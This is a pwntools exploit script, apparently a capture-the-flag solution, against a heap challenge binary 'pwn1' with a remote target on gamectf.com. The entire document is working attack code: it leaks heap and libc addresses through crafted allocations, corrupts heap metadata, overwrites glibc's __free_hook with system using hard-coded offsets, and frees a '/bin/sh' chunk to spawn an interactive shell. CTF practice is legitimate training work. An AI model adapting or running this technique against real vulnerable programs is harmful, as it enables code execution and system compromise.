1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112
| from pwn import * context.log_level = 'debug' context(arch='amd64', os='linux') local = 1 elf = ELF('./pwn1') if local: p = process('./pwn1') libc = elf.libc else: p = remote('55fca716.gamectf.com',37009) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') onegadget64 = [0x45216 , 0x4526a , 0xf02a4 , 0xf1147]
sl = lambda s : p.sendline(s) sd = lambda s : p.send(s) rc = lambda n : p.recv(n) ru = lambda s : p.recvuntil(s) ti = lambda : p.interactive()
def debug(addr,PIE=True): if PIE: text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16) gdb.attach(p,'b *{}'.format(hex(text_base+addr))) else: gdb.attach(p,"b *{}".format(hex(addr)))
def bk(addr): gdb.attach(p,"b *"+str(hex(addr)))
def malloc(size,content): ru("4.exit") sl('1') ru("Length:") sl(str(size)) ru("Content:") sd(content) def free(idx): ru("4.exit") sl('2') ru("Id:") sl(str(idx)) def edit(content): ru("4.exit") sl('3') ru("Name:") sd(content)
malloc(0x100,'aaaaaaaa')
malloc(0x91,'aaaaaaaa') malloc(0x100,'aaaaaaaa') malloc(0x100,'aaaaaaaa') free(0) free(2)
malloc(0x100,'bbbbbbbb') ru('bbbbbbbb') heap = u64(rc(6).ljust(8,'\x00'))-0x1b0 malloc(0x100,'bbbbbbbb') ru('bbbbbbbb')
libc_base = u64(rc(6).ljust(8,'\x00'))-0x3c4b78 print "heap--->" + hex(heap) print "libc_base--->" + hex(libc_base) onegadget = libc_base + onegadget64[2] system = libc_base + libc.sym['system'] free_hook = libc_base + libc.sym["__free_hook"] fake_chunk = free_hook-0x48 system = libc_base + libc.sym["system"] ru("4.exit") sl('666') base_addr = int(ru("chunk")[:-5],16)-0x202040 print "base_addr-->" + hex(base_addr) free(3) free(2) free(1) free(0)
py = '' py += 'a'*0xe0 py += p64(0) + p64(0x1c1) malloc(0x120,py) malloc(0xb8,'2222') malloc(0xb8,'3333') malloc(0xb8,'/bin/sh\x00')
edit('a'*0x20+p64(base_addr+0x202041)) edit('a'*0x20+p64(libc_base+0x3c67f8)) edit('a'*0x20+p64(free_hook-0x43)) free(2) free(1) py = '' py += 'a'*0xf0 py += p64(0) + p64(0xc1) py += p64(fake_chunk) malloc(0x1b0,py) malloc(0xb8,'6666') py = '' py += '\x00'*0x38 + p64(system) malloc(0xb8,py) free(3) p.interactive()
|